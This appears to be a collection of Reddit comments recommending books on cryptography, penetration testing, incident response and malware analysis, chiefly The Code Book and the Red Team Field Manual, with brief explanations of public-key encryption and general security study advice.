Now, what if instead you manufactured thousands of locks but only one key that opened them all. You sent those locks out in to the world to everyone that might want to send you a package. Anytime someone wanted to send you a package they simply grab one of your locks, lock the box, and send it to you. No one else can open the lock and the key is never sent anywhere, you can keep it safe at your house. This is asymmetric encryption and the basis for most everything we have on the internet nowadays. The locks you manufacture and send out into the world are you 'public key', and the key you keep is your 'private key'. Obviously the details get into some math and particularly how you can make and equivalent of this key/lock analogy but with very large prime numbers.
If you're at all interested in the topic, read this:
https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323
For those wanting to learn more about how this quantum photon based encryption came about, and much more, check out The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography.
Your Inner Fish
How to Teach Physics to Your Dog
The Universe and Dr. Einstein
The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography
The Code Book by Simon Singh.
Amazing history and explanation of cryptography, all the way from ancient ciphers to theorized quantum stuff.
If they're REALLY bored and trapped, they'll figure out how to get here. They just need look at people's comments to surf to this post.
I've done a desultory look at it and am flummoxed. Also lazy; the letter patterns don't correspond to anything, so it's either single substitution plus nulls or transposition, pair substitution (seems likely; that's something that came up in a Sayer book and so should be moderately well known), or, well, a completely different thing. Pair substitution is unlikely since there's not enough code there to analyze.
So yeah; flummoxed.
You may already know that /r/codes/ is a thing.
I like The Code Book
For an excellent, easily accessible description of some of these codes and the work done to break them, I recommend The Code Book by Simon Singh. Amazon link
Educate yourselves! Anybody know a better layman's book than The Code Book?
http://i.imgur.com/ICg0lMH.png
This book is a pretty good beginning on the topic.
http://www.amazon.com/The-Code-Book-Science-Cryptography/dp/0385495323
You can also find it online in pdf.
A quantum computer is able to but the bits of data that make up computer information into a superposition where the 0s and 1s at the same time and rapidly go bit by bit checking the combinations.
A quantum computer could break an RSA, SHA, etc encryption scheme but a quantum computer could also be able to create a cryptography scheme that uses the quantum computer and thus you'd wind up with a quantum computer trying to break quantum encryption.
This is a high level overview and if someone has extra time please add to it.
There was a really excellent section on exactly this in the code book if you're interested in some reading about it. But the book is more generally about the history of cryptography and codebreaking...
It went over a lot of the history of figuring out Egyptian hieroglyphs and one or two other ancient languages with little to no clues about their meaning and interpretation. Sorry I don't remember the specifics...
No idea if it's the book you're talking about, but The Code Book has a large section on the Enigma Code. It's a great layman's introduction to cryptology that goes through both the math and the history of several major cryptological innovations. I can't recommend it enough.
This one: https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323
The Code Book - Read it for our digital security class in college.
Amazon Link
Although it is more of a story book than a textbook.
Books on project management, software development lifecycle, history of computing/programming, and other books on management/theory. It's hard to read about actual programming if you can't practice it.
Some of my favorites:
You can't exactly learn to program without doing, but hopefully these books will give you good ideas on the theories and management to give you the best understanding when you get out. They should give you an approach many here don't have to realize that programming is just a tool to get to the end, and you can really know before you even touch any code how to best organize things.
IF you have access to a computer and the internet, look into taking courses on Udacity, Coursera, and EDX. Don't go to or pay for any for-profit technical school no matter how enticing their marketing may tell you you'll be a CEO out of their program.
https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323
Thanks, spit334. I'd like to take the opportunity to recommend Simon Singh's The Code Book. Fascinating, and a great read. I have lent my copy to many friends over the years and it never fails to enthrall.
I picked up The Code Book from a used bookstore and let it sit on my shelf for about a year. It's a light history of cryptography from ancient times until modern, but for some reason I was afraid it would be too dense and math-heavy for me to understand. On the contrary, it's a very accessible introduction to the development of cryptography and entertaining examples from history, which sparked an interest in crypto that i've been planning to explore further.
Bingo. It's silly to get all up in arms about privacy when you can't even lock your own doors. Right now we're trying to enforce that we can, reliably, lock our door.
I suspect fingerprints (and perhaps in the future retinal) scans will make this better. You can create some nice entropy from a fingerprint, since they are very unique. You can also use that as half of your key with a password as dual authentication making you really freaking secure. BUT with a backdoor -- none of that matters, as they have access to decrypt it, or worse, install malicious software. Imagine the bot net you could create with iPhones alone.
To be fair, it's not unreasonable to call in their history.
Check out this link as a good starter: http://en.wikipedia.org/wiki/Export_of_cryptography_from_the_United_States
I'm not sure if you know much about crypto (I'm a huge crypto fan, especially of it's history). If you are ever interested -- check out this book: http://smile.amazon.com/dp/0385495323
It's a fantastic read.
https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323/ref=nodl_
I purchased this book at the recommendation from a fellow raid secrets subscriber and I’m not huge fan of reading. Very cool book that goes thru the history of cryptography.
One I've recommended before for someone graduating is Cracking the Coding Interview. One other that's on my reading list is this book on the history of cryptography, I haven't read it yet but it looks fascinating.
I know
The point is, you were called on a bad example. Instead of graciously accepting bad example you went 'wah wah wah there are other ways.' You're not wrong but failing to acknowledge valid criticisim of your point is poor form.
Well said. I strongly encourage anyone even vaguely interested to read Bruce Schneier's latest book Data & Goliath which explores this.
Currently Practical Malware Analysis is the go to book. The first few chapters go over basic techniques and tools. The remaining of the book focuses on advanced techniques like disassembling and debugging samples.
Another good book is Malware Analyst's Cookbook. This gives some good recipes and tools to use.
I don't have much experiencing detecting samples that AV misses. I would first start out with a tool like MalwareBytes Anti-Malware. A lot of malware will try to "phone home", so you could monitor networking from the system. There are also common places on the system malware uses. I've seen samples use the temp, startup, and application data directories. You should also check the registry for any files to run at start. Hope this helps.
My recommendations then for self study:
Read all those and you will be in good shape ;)
EDIT: I hate trying to get reddit to do what I want.
That's cool. I used to play around with malware (analyzing it via a debugger, writing it) and learned quite a bit about security (I'm sure you know how many idiots there are out there armed with PHP and an introduction book.)
Some questions, then:
I bought this one and like it a lot. It even comes with a disk with some neutered examples to analyze.
Do you have a link to the Stuxnet article?
Edit: Are you referring to this book?
There's also a book https://www.amazon.com/Threat-Modeling-Designing-Adam-Shostack/dp/1118809998
From Applied Cryptography 1996
>One of the consequences of the second law of thermodynamics is that a certain amount of energy is necessary to represent information. To record a single bit by changing the state of a system requires an amount of energy no less than kT, where T is the absolute temperature of the system and k is the Boltzman constant. (Stick with me; the physics lesson is almost over.)
>Given that k = 1.38×10-16 erg/°Kelvin, and that the ambient temperature of the universe is 3.2°Kelvin, an ideal computer running at 3.2°K would consume 4.4×10-16 ergs every time it set or cleared a bit. To run a computer any colder than the cosmic background radiation would require extra energy to run a heat pump.
>Now, the annual energy output of our sun is about 1.21×1041 ergs. This is enough to power about 2.7×1056 single bit changes on our ideal computer; enough state changes to put a 187-bit counter through all its values. If we built a Dyson sphere around the sun and captured all its energy for 32 years, without any loss, we could power a computer to count up to 2192. Of course, it wouldn't have the energy left over to perform any useful calculations with this counter.
>But that's just one star, and a measly one at that. A typical supernova releases something like 1051 ergs. (About a hundred times as much energy would be released in the form of neutrinos, but let them go for now.) If all of this energy could be channeled into a single orgy of computation, a 219-bit counter could be cycled through all of its states.
>These numbers have nothing to do with the technology of the devices; they are the maximums that thermodynamics will allow. And they strongly imply that brute-force attacks against 256-bit keys will be infeasible until computers are built from something other than matter and occupy something other than space.
Read: Applied Cryptography by Bruce Schneier. Goes through implementation and attack details on several older algorithms, as well as all sorts of cool applications. It's an older book, but the older algorithms are easier to understand and start with.
From what I gather, it has to do with hacking computers. http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/ref=pd_rhf_se_s_cp_4_XYAH?ie=UTF8&amp;refRID=1JBCRB3Q9672J44NKK9A
Since this is the subreddit for DFIR, that's what you're going to end up with as far as suggestions go. For pentesting stuff, checkout:
-Web Application Hacker's Handbook: https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470 (this has some labs, but just reading through the various weaknesses in WebApps will be a great start)
-The Hacker Playbook: https://www.amazon.com/dp/1512214566/ref=pd_lpo_sbs_dp_ss_1?pf_rd_p=1944687742&amp;pf_rd_s=lpo-top-stripe-1&amp;pf_rd_t=201&amp;pf_rd_i=1118026470&amp;pf_rd_m=ATVPDKIKX0DER&amp;pf_rd_r=1NSA1RZZ3WQTP374S9WK
Red Team Field Manual: https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/ref=pd_bxgy_14_img_2?ie=UTF8&amp;psc=1&amp;refRID=S7FG8F9TCMZMM9HVX2TN
Those two are good general pentesting books. You might also try /r/AskNetsec for other suggestions.
https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/ref=sr_1_1?ie=UTF8&amp;qid=1393996549&amp;sr=8-1&amp;keywords=red+team+field+manual
The red team field manual (rtfm) is a decent little cheat sheet booklet of unix shell commands, mostly geared towards hacking but useful for troubleshooting and learning networking.
I know I linked you the amazon one but theres free copies on github.
You could find out for only 9$ now on Amazon. but I think pat131 is right though, it looks like an overhyped basic pentesting manual specially designed to extract money from script kiddies pockets. There are certainly better and more up to date resource available for free on the internet.
ps. "pen-tester" is the politically correct term for Hacker
It's actually a thing.
http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504
Just tell him to go read the R.T.F.M. book
If you have to use Windows, and many of us do, do yourself a favor and learn some PowerShell. "ls" is a supported alias. In fact, a lot of Unix style commands are. It even uses the pipeline "|" only instead of piping text you are passing .Net objects.
> ps notepad | kill
You don't have to parse out the process id. It derives that from the object.
Do yourself a further favor and install Git. Then you can include all the tools under its usr/bin directory in your path and have such tools as grep, du, find, ssh, scp, etc. all complied for Windows.
The look on a Windows sysadmin's face when you ssh to a remote server from a pwsh command line makes it all worthwhile.
Edit: I mean, I even run vim with a custom vimrc file in a pwsh console on Windows 10 with my keyboard remapped to Dvorack. And GVim is my default tool for .txt files. I get a lot of weird looks from the Windows sysadmins.
Edit #2: If you want some really squirrely but very effective Win cmd style commands, check out the Red Team Field Manual. Some good shit in here for Linux too.
RTFM
Make your life easier and order this...
http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504
I use it for pentesting, but it is a solid small reference book with Linux commands, as well as Windows and others.
You can always grab the O'Reilly Linux book, but this is much more portable and has room for notes.
$8.
Que mas quieres hacer? No saques mas nada Cisco si no estas pendiente de hacer networking y aun asi, Cisco no se esta usando tanto como otros (Palo Alto por ejemplo).
Si quieres hacer Incident Response y Pentest, lanzate estos libros
https://www.amazon.com/Blue-Team-Handbook-condensed-Responder/dp/1500734756/ref=sr_1_1?ie=UTF8&amp;qid=1479171676&amp;sr=8-1&amp;keywords=blue+team+handbook
https://www.amazon.com/gp/product/1494295504/ref=pd_bxgy_14_img_2?ie=UTF8&amp;psc=1&amp;refRID=P8TB8XKCFAKNQBRS1EG5
https://www.amazon.com/gp/product/1512214566/ref=pd_bxgy_14_img_3?ie=UTF8&amp;psc=1&amp;refRID=P8TB8XKCFAKNQBRS1EG5
Tienes que definir un poco mas que quieres hacer. Que te atrae mas de cybser security?
I mean the book,, RTFM - https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504
The biggest thing is the material they provide. The Red team field manual RTFM helped a ton early on.
Also want to add "Blue Team Handbook: Incident Response Edition".
http://www.amazon.com/Blue-Team-Handbook-condensed-Responder/dp/1500734756
Edit:
Don't forgot to grab all the Humble Bundle for 15$ {you can pay 0.01$ and get most of them}.
https://www.humblebundle.com/books/no-starch-hacking-books
The blue team handbook is good too
https://www.amazon.com/Blue-Team-Handbook-condensed-Responder/dp/1500734756
Blahhh i meant Don Murdoch's book, Blue Team Handbook vol 2
&#x200B;
https://www.amazon.com/dp/1500734756/
I agree with /u/Mxyzptlk_ about starting off with books and online material, as these will help you to get a feel for the topics you'll likely need to cover.
As a brief overview SANS provide a condensed handbook for IR - https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901 (PDF)
Although it's not everyone's cup of tea, and is certainly expensive, the SANS GIAC Certified Incident Handler certification is well worth pursuing in my opinion. I recently passed the exam after taking the training in July, and I've found lots of useful information during the process which has helped me out in my role.
Although this book may be for a bit further down the line, I would highly recommend the Blue Team Handbook: Incident Response Edition manual.
Hope this helps!
> blue team handbook
https://www.amazon.com/Blue-Team-Handbook-condensed-Responder/dp/1500734756
Is this the book you are referring to?
https://www.amazon.com/Blue-Team-Field-Manual-BTFM/dp/154101636X/ref=sr_1_1?ie=UTF8&amp;qid=1506698119&amp;sr=8-1&amp;keywords=blue+team+field+manual
http://www.amazon.com/Malware-Forensics-Investigating-Analyzing-Malicious/dp/159749268X
Book covers both linux and windows.
Although "security through obscurity" by itself is not useful. The book Offensive Countermeasures: The Art of Active Defense by Strand, John; Asadoorian, Paul; Donnelly, Benjamin; Galbraith, Bryce; and Robish, Ethan argues effectively that security through obfuscation can be useful when combined with monitoring and detection.
If you want to understand the state of privacy, I highly recommend reading this book:
https://www.amazon.com/dp/B004IK8PLE?ref_=cm_sw_r_kb_dp_j4QBCb50GGMEN&amp;tag=kpembed-20&amp;linkCode=kpe
This is not a fight that we win or lose. This is a never ending war with skirmishes and stalemates. You are in charge of your own privacy with what you say or do.
Some pretty good reads on the subject:
Top Secret: A Handbook of Codes, Ciphers and Secret Writing https://www.amazon.com/dp/0763629723/ref=cm_sw_r_awd_WF1Dub0WN55RY
The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography https://www.amazon.com/gp/aw/d/B004IK8PLE/ref=aw_ss_kndl_dp/
Codebreaker: The History of Codes and Ciphers https://www.amazon.com/dp/0802715478/ref=cm_sw_r_awd_OH1Dub103RXB7
And, believe it or not,
Cracking Codes and Cryptograms For Dummies https://www.amazon.com/gp/aw/d/B005CB22A8/ref=aw_ss_kndl_dp/
You also might check your local newspaper for "Cryptoquote." It's a daily quote that uses a different cipher each day. Great for practice!
http://www.amazon.com/Boy-Roald-Dahl-ebook/dp/B00F9F0TV6/ref=sr_1_1?s=digital-text&amp;ie=UTF8&amp;qid=1420691549&amp;sr=1-1&amp;keywords=roald+dahl+boy
http://www.amazon.com/Code-Book-Science-Secrecy-Cryptography-ebook/dp/B004IK8PLE/ref=sr_1_1?s=digital-text&amp;ie=UTF8&amp;qid=1420691613&amp;sr=1-1&amp;keywords=the+code+book+simon+singh
"Boy" is probably "beneath" your son's level and "The Code Book" is may challenge your daughter but I think that those are books that they could both enjoy, so that'd be good bang-for-buck.
I'll also recommend "The Adventures of Sherlock Holmes," for your son, and, maybe, some classics, like "The Swiss Family Robinson" or Jules Verne but it's difficult, not knowing anything about them (not that you should be posting detailed descriptions of your kids).
Read this a while back, if you enjoyed you should also check out: Fatal System Error: The Hunt for the New Crime Lords Who Are Bringing Down the Internet & DarkMarket
If anyone else has any recommendations for books similar to these it would be appreciated.
Audiobooks are a performance of sorts, so you "right" book can suck with a "bad" reader. But a "good" book with a "great" reader can be fantastic. Check out the Bobbiverse sci-fi series, and Bruce Dickinson's autobiography (no, really!). James Clavell's Shogun is good too... off the top of my head. Oh, Countdown to Zero Day was superlative!
The author of the Wired piece is well versed in this topic. See Countdown to Zero Day. Hint: It's about Stuxnet.
Yes, and I think that LulzSec will, in the not-too-distant future, be viewed as a sort of predecessor army or online militia to the ones that will define warfare in the future and are already defining warfare now. This was very clearly prophesied by this book, published in January 2007--and China is the main 'actor':
http://www.amazon.com/Breakpoint-Richard-Clarke/dp/0399153780
And from April 2010:
http://www.amazon.com/Cyber-War-Threat-National-Security/dp/0061962236
And a related one by another author, from September 2011:
http://www.amazon.com/America-Vulnerable-Digital-Espionage-Warfare/dp/159420313X/ref=pd_bxgy_b_img_y
> At a security conference in 2002, after citing statistics that indicate that less than 0.0025 percent of corporate revenue on average is spent on information-technology security, Clarke was famously heard to say, "If you spend more on coffee than on IT security, then you will be hacked. What's more, you deserve to be hacked."[10]
http://en.wikipedia.org/wiki/Richard_A._Clarke
Then see these bits of news, from February 2011, and here's China:
Bloomberg.com: Exxon, Shell Said to Have Been Hacked Via Chinese Servers
http://www.bloomberg.com/news/2011-02-24/exxon-shell-bp-said-to-have-been-hacked-through-chinese-internet-servers.html
V3.co.uk: Night Dragon hackers targeted Shell, BP and Exxon
http://www.v3.co.uk/v3-uk/news/2030642/night-dragon-hackers-targeted-shell-bp-exxon
ComputerWeekly.com: Exxon, Shell, BP hacked in Night Dragon attacks
http://www.computerweekly.com/news/1280095257/Exxon-Shell-BP-hacked-in-Night-Dragon-attacks
Die zwarte markt bestaat al decennia, er is een mooi boek over geschreven waar ondermeer uit blijkt hoe dat wereldje al lange lange tijd bestaat een werkt.
Countdown to Zerodays
Daarnaast is de wens van de overheid begrijpelijk (zij moeten een veilig bestaan voor hun burgers garanderen, en met de terroristische dreiging, is dat heel moeilijk. en is dit een voor de hand liggende wens (want dat konden ze altijd al)
Echter is de volgende vorm van versleuteling onbreekbaar. Zodra deze gebroken is, verandert het bericht en heeft de ontvanger het direct door. het heet quantum encryptie.
De geschiedenis van encryptie, van het begin in Egypte mede langs kraken van de Duitste enigma machine in WOII, eindigend bij quantum encryptie is erg leuk beschreven in:
The Code Book
Sure - we are working through this right now along with a lot of supplemental material the teacher has put together himself - the book is fine on its own though.
https://www.amazon.com/gp/product/1530506565/ref=oh_aui_detailpage_o01_s00?ie=UTF8&amp;psc=1
While you could technically jump straight into this and start messing around with the pen testing applications, I'd strongly recommend working through the book from my original post as you'll have a strong foundation of what you are actually doing and what to do when things go wrong or aren't working exactly right.
We also use this book, however I'd probably not recommend spending the money unless you have worked through both books and really want to get into pen testing. Even then I probably wouldn't recommend it as its just a reference book or "cheat sheet" of popular commands, locations of files like passwords, etc. etc. Its made to be taken out to the field and as a small reference book if you forget something and don't have time for google. We are using it because we are actually doing pen testing in random labs where we walk into a room for the first time and have two hours to exploit various things. Ill link it anyway though just in case:
https://www.amazon.com/gp/product/1494295504/ref=oh_aui_detailpage_o01_s00?ie=UTF8&amp;psc=1
There is another book we haven't bought but he may have us pick up and if that happens ill link it as well. Hope this all helped and good luck!
edit: I forgot about this - we will be using some of this once we've finished the second book in a few weeks:
https://www.amazon.com/dp/1787120236/ref=sspa_dk_detail_1?psc=1&amp;pd_rd_i=1787120236&amp;pd_rd_wg=ER8Ij&amp;pd_rd_r=XXN8MBMYPHSMXCBYGQX8&amp;pd_rd_w=lHcrS
Appears to be the logo for the Red Team Field Manual. Twitter page here. Amazon link to the book here. This is a reference book for common command line tools used in the security field. Penetration testers would use this, red team / blue team scenario participants, etc.
"Red team" is the common term used for the "bad guys" in security training scenarios. Having a hard copy reference is nice because you are many times operating blind, crafting complex command groups without being able to see the output or reference the man page.